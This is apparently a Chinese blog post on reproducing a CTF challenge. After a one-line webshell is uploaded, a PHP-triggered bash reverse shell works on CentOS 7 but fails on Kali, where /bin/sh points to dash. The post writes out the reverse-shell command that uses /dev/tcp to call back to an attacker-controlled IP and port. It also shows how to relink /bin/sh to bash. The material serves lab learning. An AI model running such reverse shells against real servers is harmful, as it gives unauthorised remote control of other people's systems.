关于Centos与Ubuntu使用php反弹shell结果不同的问题

在复现一个CTF题时,上传上去了一句话木马,但是不允许用菜刀连接,所以我是想vps上监听一个端口,然后直接用hackbar反弹shell,结果死活反弹不回来。而在我印象中是有直接使用hackbar反弹shell成功的前例。因而有了此篇文章。

刚开始是在kali上测试的,也是死活谈不回来

正常的反弹命令:bash -i >&/dev/tcp/192.168.1.103/123 0>&1
然后由于是在post中,所以需要给&编码,变成%26,可是还是弹不回来???

后来试着在kali终端中直接执行这条命令,没问题,能弹回来

然后写了一个php脚本,内容如下:

然后,执行该脚本,他丫的居然报错了???

我去?什么鬼?

后来在Centos7中创建了同样的一个脚本,执行得到如下结果:

这个为啥就成功弹回来了???不科学伐!!!

经过测试得到,Centos7中可以弹回shell,而kali就是不行!!!

后来网上搜索了一下解决方法,是因为ubuntu从6.10开始,默认使用dash(登录还是用bash),因为dash更快更高效。只要把bash链接到sh即可。。。

可以看到kali中确实sh默认是链接的dash

将bash链接到sh后,再次执行该脚本

1
2
mv /bin/sh /bin/sh.orig
ln -s /bin/bash /bin/sh

然后就可以成功的弹回shell了

本文标题:关于Centos与Ubuntu使用php反弹shell结果不同的问题

文章作者:暮沉沉

发布时间:2019年01月15日 - 16:01

最后更新:2019年01月15日 - 16:01

原始链接:http://maplege.github.io/2019/01/15/reverse-shell-diff/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------本文结束感谢您的阅读-------------